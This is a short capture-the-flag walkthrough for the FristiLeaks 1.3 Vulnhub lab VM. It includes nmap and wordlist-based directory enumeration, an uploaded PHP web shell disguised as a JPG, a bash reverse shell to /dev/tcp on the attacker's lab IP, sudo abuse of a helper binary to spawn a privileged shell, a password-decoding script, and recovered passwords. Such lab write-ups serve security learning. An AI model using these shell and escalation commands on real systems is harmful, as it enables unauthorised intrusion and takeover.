Vulnhub 133 FRISTILEAKS 1.3

Target VM link: https://vulnhub.com/entry/fristileaks-13,133/

Environment setup

Name               IP
Kali Linux         192.168.88.153
FRISTILEAKS: 1.3   192.168.88.156

Initial foothold

Port scan

$ export rip=192.168.88.156
$ sudo nmap -v -A -p- $rip

$ cewl http://192.168.88.156/  >pass
$ dirb http://192.168.88.156/ pass

http://192.168.88.156/fristi/uploads/r444.php.jpg

/home/admin/../../bin/bash -i >& /dev/tcp/192.168.88.153/555 0>&1
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom touch /tmp/1
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom bash -p

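import base64
import codecs
import sys

def decodeString(encoded):
    # Reverse the string, apply ROT13, then Base64-decode the result.
    rot13string = codecs.decode(encoded[::-1], 'rot13')
    return base64.b64decode(rot13string).decode()

if __name__ == '__main__':
    print(decodeString(sys.argv[1]))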

LetThereBeFristi!
thisisalsopw123


Last modified on 2015-12-14